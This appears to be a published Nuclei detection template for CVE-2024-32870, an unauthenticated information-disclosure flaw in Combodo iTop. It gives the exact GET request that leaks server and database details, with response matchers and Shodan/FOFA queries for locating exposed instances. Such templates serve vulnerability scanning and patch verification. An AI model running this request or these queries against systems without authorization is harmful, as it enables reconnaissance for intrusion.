Combodo iTop is a simple, web based IT Service Management tool. Server, OS, DBMS, PHP, and iTop info (name, version and parameters) can be read by anyone having access to iTop URI. This issue has been patched in versions 2.7.11, 3.0.5, 3.1.2, and 3.2.0.
PoC代码[已公开]
id: CVE-2024-32870
info:
name: iTop Hub Connector - Information Disclosure
author: DhiyaneshDk
severity: medium
description: |
Combodo iTop is a simple, web based IT Service Management tool. Server, OS, DBMS, PHP, and iTop info (name, version and parameters) can be read by anyone having access to iTop URI. This issue has been patched in versions 2.7.11, 3.0.5, 3.1.2, and 3.2.0.
remediation: Users are advised to upgrade.There are no known workarounds for this vulnerability.
reference:
- https://www.synacktiv.com/en/advisories/multiple-vulnerabilities-on-itop
- https://github.com/Combodo/iTop/security/advisories/GHSA-rfjh-2f5x-qxmx
- https://nvd.nist.gov/vuln/detail/CVE-2024-32870
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2024-32870
cwe-id: CWE-200
epss-score: 0.09011
epss-percentile: 0.92311
cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
metadata:
vendor: combodo
product: itop
shodan-query: html:"iTop login"
fofa-query: body="iTop login"
tags: cve,cve2024,itop,disclosure,unauth,exposure,vkev
http:
- method: GET
path:
- "{{BaseURL}}/pages/exec.php?exec_module=itop-hub-connector&exec_page=launch.php&target=inform_after_setup"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'database_settings'
- 'database_version'
- 'database_settings'
- 'instance_host'
condition: and
- type: status
status:
- 200
# digest: 4b0a004830460221008e9fd164ebd67efdb3369d80b5766389ce81cbc47344e320bf639193d1a9efbc022100b5043ab691fae69e3d6bc0f89bf3b2eb9c76e9aac75d9a45c69318d7d54893d8:922c64590222798bb761d5b6d8e72950